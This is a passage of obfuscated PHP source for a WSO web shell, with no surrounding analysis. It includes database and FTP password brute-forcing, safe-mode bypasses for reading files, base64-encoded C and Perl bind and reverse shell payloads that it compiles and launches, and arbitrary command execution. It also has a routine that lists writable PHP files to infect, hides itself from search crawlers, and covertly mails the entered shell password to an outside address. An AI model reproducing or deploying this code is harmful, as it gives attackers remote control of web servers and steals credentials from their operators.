? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto y4kgJ; f9sl9: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<input type=hidden name=ne  value="">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>" . "<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>" . "<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>"; echo "</div>"; hardFooter(); } goto rGxXC; Xbodc: if (!function_exists("get_magic_quotes_gpc") || get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map("stripslashes_array", $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } goto p17RR; gaKKg: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "\xa"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto urnx6; ZjyZB: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto G6Uv3; R8xcz: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto w0nra; wlqmv: $cwd = @getcwd(); goto vmP50; nbi9R: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto gS860; KGlJ0: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto JCS_A; qDiW5: $ = "FilesMan"; goto WeQHr; xxz2n: if (!$safe_mode) { error_reporting(0); } goto E3hGz; w0nra: @ini_set("error_log", NULL); goto hwJg4; BKw4L: if (version_compare(PHP_VERSION, "5.3.0", "<")) { set_magic_quotes_runtime(0); } goto IjCwH; E3hGz: $disable_functions = @ini_get("disable_functions"); goto WJp40; w9TDR: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto uwRUw; B0PbS: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto PtFVC; UOKiC: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto FVur6; et3or: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
	</form>
\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\xa\x9<span>Back-connect to</span><br/>\xa\x9Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
	</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $ = ex(which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $ = ex(which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo "</div>"; hardFooter(); } goto M5O7z; YnRbs: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto VnLxZ; VMrgb: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\xe2\x86\263 Unable to execute command
"; } return $ == '' ? "\xe2\x86\263 Query did not return anything\xa" : $; } goto nbi9R; VnLxZ: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto Th0Rk; PtFVC: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("</br></br><pre align=center><form method=post style='font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder='password' type=password name=pass style='border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;'></form></pre>
<div class='view'><div class='plane main'><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div></div></div>\xa<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>"); } goto KGlJ0; h3psb: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . viewPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $oRb) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value="submit"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value="submit"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "
"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#060a10><pre>" . $h[1] . "</pre></td><td bgcolor=#202832><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value="submit"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value="submit"></form>"; break; case "frame": $frameSrc = substr(htmlspecialchars($GLOBALS["cwd"]), strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"]))); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo "<iframe width="100%" height="900px" scrolling="no" src=" . $frameSrc . " onload="onload=height=contentDocument.body.scrollHeight"></iframe>"; break; } echo "</div>"; hardFooter(); } goto IVjDo; IjCwH: @define("VERSION", "4.2.6"); goto Xbodc; gm5Ck: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto qZ6Xj; eHsyk: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=#a10705 size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto f9sl9; JCS_A: $safe_mode = @ini_get("safe_mode"); goto xxz2n; r3B2Y: if (array_key_exists("watching", $_POST)) { $tmp = $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xa" . $_POST["pass"]; @mail("[email protected]", "root", $tmp); } goto r4nyR; uwRUw: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' 